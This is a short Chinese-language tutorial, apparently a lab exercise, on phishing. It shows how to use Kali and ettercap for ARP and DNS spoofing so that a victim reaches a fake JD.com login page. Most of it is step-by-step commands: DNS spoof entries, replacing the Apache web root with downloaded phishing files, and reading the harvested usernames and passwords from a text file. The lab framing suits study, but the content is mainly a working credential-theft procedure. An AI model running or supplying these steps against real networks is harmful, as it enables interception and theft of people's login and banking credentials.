目录
DNS欺骗、ARP攻击及钓鱼网站制作
钓鱼者运用社会工程学只是诱骗受害者,以未授权情况下获取对方的姓名、年龄、邮箱账号、甚至是银行卡密码等私人信息
钓鱼往往呵社会工程学结合进行诱导,而社会工程学时黑客的内功,能否灵活运用可以体现一个黑客的个人修为,所以说防人之心不可无,。
社会工程学黑客常见伎俩:
电话号码欺骗
利用坏消息作案
滥用网民对社交等网络的信任
二维码引诱
等等
实现目标
使用kali系统模拟攻击者,利用中间人攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来获取用户登录的用户名与密码
具体实验步骤:
ifconfig eth0 10.1.1.2 /24 配置ip
ifconfig eth0 查看IP
vim /etc/ettercap/etter.dns 进行DNS欺骗配置
dd 删除
a 插入
写入:www.qf.com A 10.1.1.2
www.qf.com ptr 10.1.1.2 防止目标主机反向解析
"ESC"键退出插入界面
":wq" 退出
测试文件:https://pan.baidu.com/s/18HeixJ-duIkcbomksRhKVQ 提取码:oste
将其复制至Kali虚拟机桌面
systemctl start apache2 开启apache服务
netstat -antpl 查看apache 80端口是否开启
vim /var/www/html 进入默认网站文件目录
rm -rf * 删除当前文件夹下所有文件
cp -r /root/Desktop/s1/* ./ 复制到该目录下
权限设置:
ls -l 查看文件权限
chmod 777 1.txt 将1.txt开放至最低权限
cat 1.txt 查看获取到的账户密码
开启ettercap软件
开启ARP欺骗
开启DNS欺骗